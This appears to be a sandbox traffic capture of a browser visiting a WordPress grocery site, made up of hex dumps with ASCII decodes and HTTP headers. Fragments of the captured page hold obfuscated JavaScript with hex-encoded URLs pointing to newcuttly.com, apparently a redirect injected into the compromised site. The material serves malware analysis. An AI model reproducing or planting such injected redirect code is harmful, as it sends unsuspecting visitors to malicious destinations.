                                  2024-11-12 15:41:08 UTC8000INData Raw: 61 72 64 65 6e 66 72 65 73 68 65 67 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 61 72 64 65 6e 66 72 65 73 68 65 67 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32
                                  Data Ascii: ardenfresheg.com/feed/" /><link rel="alternate" type="application/rss+xml" title=" &raquo; Comments Feed" href="https://gardenfresheg.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72
                                  2024-11-12 15:41:08 UTC8000INData Raw: 78 32 66 5c 78 36 65 5c 78 36 35 5c 78 37 37 5c 78 36 33 5c 78 37 35 5c 78 37 34 5c 78 37 34 5c 78 36 63 5c 78 37 39 5c 78 32 65 5c 78 36 33 5c 78 36 66 5c 78 36 64 5c 78 32 66 5c 78 36 37 5c 78 34 31 5c 78 34 35 5c 78 33 30 5c 78 36 33 5c 78 33 32 30 27 2c 27 5c 78 36 38 5c 78 37 34 5c 78 37 34 5c 78 37 30 5c 78 33 61 5c 78 32 66 5c 78 32 66 5c 78 36 65 5c 78 36 35 5c 78 37 37 5c 78 36 33 5c 78 37 35 5c 78 37 34 5c 78 37 34 5c 78 36 63 5c 78 37 39 5c 78 32 65 5c 78 36 33 5c 78 36 66 5c 78 36 64 5c 78 32 66 5c 78 37 31 5c 78 36 63 5c 78 37 34 5c 78 33 31 5c 78 36 33 5c 78 33 37 31 27 2c 5f 30 78 31 31 31 38 33 35 28 30 78 31 63 35 29 2c 5f 30 78 31 31 31 38 33 35 28 30 78 31 64 37 29 2c 5f 30 78 31 31 31 38 33 35 28 30 78 31 63 33 29 2c 5f 30 78 31 31 31
                                  Data Ascii: x2f\x6e\x65\x77\x63\x75\x74\x74\x6c\x79\x2e\x63\x6f\x6d\x2f\x67\x41\x45\x30\x63\x320','\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x77\x63\x75\x74\x74\x6c\x79\x2e\x63\x6f\x6d\x2f\x71\x6c\x74\x31\x63\x371',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111
                                  2024-11-12 15:41:08 UTC8000INData Raw: 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f 72 7b 63 6f
                                  Data Ascii: 25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{co
                                  2024-11-12 15:41:08 UTC8000INData Raw: 32 43 37 30 30 25 37 43 52 6f 62 6f 74 6f 25 33 41 34 30 30 25 32 43 35 30 30 25 32 43 37 30 30 25 37 43 50 6f 70 70 69 6e 73 25 33 41 34 30 30 25 32 43 35 30 30 25 32 43 37 30 30 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 26 23 30 33 38 3b 76 65 72 3d 36 2e 34 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 62 6f 6f 74 73 74 72 61 70 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 67 61 72 64 65 6e 66 72 65 73 68 65 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 67 72 6f 63 65 72 79 2d 73 74 6f 72 65 2f 76 65 6e 64 6f 72 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 3f 76 65 72 3d
                                  Data Ascii: 2C700%7CRoboto%3A400%2C500%2C700%7CPoppins%3A400%2C500%2C700&#038;display=swap&#038;ver=6.4.3' media='all' /><link rel='stylesheet' id='bootstrap-css' href='http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/bootstrap/css/bootstrap.css?ver=
                                  2024-11-12 15:41:08 UTC8000INData Raw: 09 09 09 3c 2f 73 74 79 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 61 72 64 65 6e 66 72 65 73 68 65 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 32 2f 47 61 72 64 65 6e 2d 66 72 65 73 68 2d 6c 6f 67 6f 2d 31 30 30 78 31 30 30 2e 6a 70 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 61 72 64 65 6e 66 72 65 73 68 65 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 32 2f 47 61 72 64 65 6e 2d 66 72 65 73 68 2d 6c 6f 67 6f 2e 6a 70 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 20 2f 3e
                                  Data Ascii: </style><link rel="icon" href="https://gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpg" sizes="32x32" /><link rel="icon" href="https://gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo.jpg" sizes="192x192" />
                                  2024-11-12 15:41:08 UTC8000INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 09 09 09 09 09 09 09 09 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 66 6f 72 6d 2d 6d 69 6e 69 63 61 72 74 20 62 6f 78 2d 69 63 6f 6e 2d 63 61 72 74 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 74 72 75 65 22 3e 0d 0a 09 09 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 66 6f 6e 74 2d 63 61 72 74 22 3e 3c 2f 69 3e 0d 0a 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 63 6f 6e 74 65 6e 74 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 61 72 64 65 6e 66 72 65 73 68 65 67 2e 63 6f 6d 2f 63 61 72 74 2f 22 20 74 69 74 6c 65 3d 22 56 69 65 77 20 79 6f 75 72 20 73 68 6f 70 70 69 6e 67 20 63 61 72 74 22 3e 0d 0a 09 09
                                  Data Ascii: <div class="top-form-minicart box-icon-cart" tabindex="0" autofocus="true"><i class="icofont-cart"></i><a class="cart-contents" href="https://gardenfresheg.com/cart/" title="View your shopping cart">
                                  2024-11-12 15:41:08 UTC8000INData Raw: 5f 30 78 32 37 33 37 65 30 28 30 78 31 65 30 29 2c 5f 30 78 34 38 63 63 38 38 29 2c 77 69 6e 64 6f 77 5b 5f 30 78 32 37 33 37 65 30 28 30 78 31 64 34 29 5d 28 5f 30 78 31 38 39 37 64 37 2c 5f 30 78 32 37 33 37 65 30 28 30 78 31 64 64 29 29 2c 5f 30 78 31 37 33 63 63 62 28 5f 30 78 31 38 39 37 64 37 29 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 31 36 31 61 34 33 29 7b 5f 30 78 33 37 30 65 39 33 28 5f 30 78 65 36 66 34 33 2c 5f 30 78 32 36 33 66 66 37 2c 5f 30 78 34 38 63 63 38 38 29 3b 7d 65 6c 73 65 20 5f 30 78 33 37 30 65 39 33 28 5f 30 78 65 36 66 34 33 2c 5f 30 78 32 36 33 66 66 37 2c 5f 30 78 34 38 63 63 38 38 29 3b 7d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 31 31 38 33 35 28 30 78 31 64 66 29 5d 28 5f 30 78 31 31 31 38 33 35 28 30 78 31 64 38 29 2c 5f 30
                                  Data Ascii: _0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0
                                  2024-11-12 15:41:08 UTC7333INData Raw: 73 74 20 5f 30 78 31 39 32 32 66 32 3d 5f 30 78 31 39 32 32 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 30 32 33 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 30 32 33 31 61 2c 5f 30 78 34 65 34 38 38 30 29 7b 5f 30 78 33 30 32 33 31 61 3d 5f 30 78 33 30 32 33 31 61 2d 30 78 31 62 66 3b 6c 65 74 20 5f 30 78 32 62 32 30 37 65 3d 5f 30 78 31 39 32 32 66 32 5b 5f 30 78 33 30 32 33 31 61 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 32 30 37 65 3b 7d 2c 5f 30 78 33 30 32 33 28 5f 30 78 35 36 32 30 30 36 2c 5f 30 78 31 33 33 34 64 36 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 32 32 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 61 39 39 30 62 3d 5b 27 73 75 62 73 74 72 27 2c 27 6c 65 6e 67 74 68 27 2c 27 2d 68 75 72 73 27 2c 27 6f 70 65 6e 27 2c 27 72 6f 75 6e 64 27 2c
                                  Data Ascii: st _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round',


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.449748185.230.63.1714435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:09 UTC645OUTGET /wp-content/uploads/2024/02/Garden-fresh-logo.jpg HTTP/1.1
                                  Host: gardenfresheg.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://gardenfresheg.com.americanfoodeg.com/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-12 15:41:09 UTC622INHTTP/1.1 301 Moved Permanently
                                  Date: Tue, 12 Nov 2024 15:41:09 GMT
                                  Content-Length: 0
                                  Connection: close
                                  location: https://www.gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo.jpg
                                  strict-transport-security: max-age=86400
                                  cache-control: no-cache
                                  x-wix-request-id: 1731426069.7832421022821402139
                                  x-seen-by: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLrqSEnf5P8yKCwXVlxlQNKuaplD64utOnGn2VMGhl2y8,cHRtQrknGItGja64/E4ONwqchA0VEAROgOj6VgeSDvY=,4EmzKGKKpFffqfFwZRPY8UOPsHjgkcF6MvSPC2/FIq/LIQOlTueY9A4H0TEjdrcK2DHJM9iTfmXXuzeOZI4F5g==
                                  Server: Pepyaka
                                  X-Content-Type-Options: nosniff


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.449747185.230.63.1714435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:09 UTC672OUTGET /wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gif HTTP/1.1
                                  Host: gardenfresheg.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://gardenfresheg.com.americanfoodeg.com/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-12 15:41:09 UTC649INHTTP/1.1 301 Moved Permanently
                                  Date: Tue, 12 Nov 2024 15:41:09 GMT
                                  Content-Length: 0
                                  Connection: close
                                  location: https://www.gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gif
                                  strict-transport-security: max-age=86400
                                  cache-control: no-cache
                                  x-wix-request-id: 1731426069.7932421024711402140
                                  x-seen-by: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLrqSEnf5P8yKCwXVlxlQNKuaplD64utOnGn2VMGhl2y8,ZyqOU5RmLo06QtSO1rnOlQDQLRL0CB+cXjGp7vN+JY8=,4EmzKGKKpFffqfFwZRPY8ZVV3HijRNdzA59Um8+v5am2KPhcwC3LU7GY1nMtE8zvi4KznDeOHsVWJbleGmzOhQ==
                                  Server: Pepyaka
                                  X-Content-Type-Options: nosniff


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.449750184.28.90.27443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:10 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  Accept-Encoding: identity
                                  User-Agent: Microsoft BITS/7.8
                                  Host: fs.microsoft.com
                                  2024-11-12 15:41:10 UTC467INHTTP/1.1 200 OK
                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                  Content-Type: application/octet-stream
                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                  Server: ECAcc (lpl/EF06)
                                  X-CID: 11
                                  X-Ms-ApiVersion: Distribute 1.2
                                  X-Ms-Region: prod-weu-z1
                                  Cache-Control: public, max-age=176631
                                  Date: Tue, 12 Nov 2024 15:41:10 GMT
                                  Connection: close
                                  X-CID: 2


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.44975134.149.87.454435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:10 UTC649OUTGET /wp-content/uploads/2024/02/Garden-fresh-logo.jpg HTTP/1.1
                                  Host: www.gardenfresheg.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://gardenfresheg.com.americanfoodeg.com/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-12 15:41:11 UTC984INHTTP/1.1 404 Not Found
                                  Content-Length: 2960
                                  Content-Type: text/html; charset=UTF-8
                                  Cache-Control: no-cache
                                  X-Accel-Buffering: no
                                  Content-Language: en-US
                                  Strict-Transport-Security: max-age=86400
                                  Set-Cookie: XSRF-TOKEN=1731426071|w2lIPHb04GLH; Path=/; Domain=www.gardenfresheg.com; Secure; SameSite=None
                                  X-Wix-Request-Id: 1731426070.9761575373322882413
                                  Server: Pepyaka
                                  X-Content-Type-Options: nosniff
                                  Accept-Ranges: bytes
                                  Date: Tue, 12 Nov 2024 15:41:11 GMT
                                  X-Served-By: cache-dfw-kdfw8210098-DFW
                                  X-Cache: MISS
                                  Vary: Accept-Encoding
                                  X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLhMmzknV1TfNKr21CODvg/uaplD64utOnGn2VMGhl2y8,SyyhSd/GJpnOwr8HB8ZFFqcKJ7iMPkLlyE/6thK4I68=,4EmzKGKKpFffqfFwZRPY8ZVV3HijRNdzA59Um8+v5am2KPhcwC3LU7GY1nMtE8zvi4KznDeOHsVWJbleGmzOhQ==
                                  Via: 1.1 google
                                  glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  2024-11-12 15:41:11 UTC394INData Raw: 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65
                                  Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conte
                                  2024-11-12 15:41:11 UTC1378INData Raw: 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f
                                  Data Ascii: width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" type="text/css" /> ... --> <link rel="stylesheet" href="//
                                  2024-11-12 15:41:11 UTC1188INData Raw: 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 73 74 61 74 69 63 73 55 72 6c 27 2c 20 27 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28
                                  Data Ascii: om/services/wix-public/1.719.0/scripts/error-pages/app.js"></script> ... --><script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.719.0/'); angular.module('wixErrorPagesApp').constant(


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.44975234.149.87.454435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:11 UTC676OUTGET /wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gif HTTP/1.1
                                  Host: www.gardenfresheg.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://gardenfresheg.com.americanfoodeg.com/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-12 15:41:11 UTC1132INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Language: en-US
                                  Strict-Transport-Security: max-age=86400
                                  X-Wix-Request-Id: 1731426071.71624545349311439675
                                  Cache-Control: public,max-age=0,must-revalidate
                                  Server: Pepyaka
                                  X-Content-Type-Options: nosniff
                                  Accept-Ranges: bytes
                                  Age: 0
                                  Date: Tue, 12 Nov 2024 15:41:11 GMT
                                  X-Served-By: cache-dfw-kdfw8210108-DFW
                                  X-Cache: MISS
                                  Vary: Accept-Encoding
                                  Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_virginia-pub_g
                                  X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqMdbasEzJedGS3Ki75xXnAtFZnRrnvyqOEKpetNb+u3,2d58ifebGbosy5xc+FRalpycqC1rjJeyM0igIjXtAi87vzNeZ/8dq/fiKEm8Dxcpx48gfqrQcoINN2IAhyxCIQ==,2UNV7KOq4oGjA5+PKsX47EX4ArvKW2rSVXB8jSb0NZlBgoOYGa1MpluGPPjG4/Tb,/B3VgDtICCNDWQOEWfZmMgGlx2EGNjBt1mOARmme9gQ=,QCwmNx1TNUYLIqEqVA58OGrL5QIbbhdAZMtl9k/EvDUj6r0AZAMucqm4C7kwBEyaGbuDVMLC73nuBvy48N2uMw==
                                  Transfer-Encoding: chunked
                                  Via: 1.1 google
                                  glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  2024-11-12 15:41:11 UTC246INData Raw: 62 39 31 0d 0a 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d
                                  Data Ascii: b91 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Com
                                  2024-11-12 15:41:11 UTC1378INData Raw: 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74
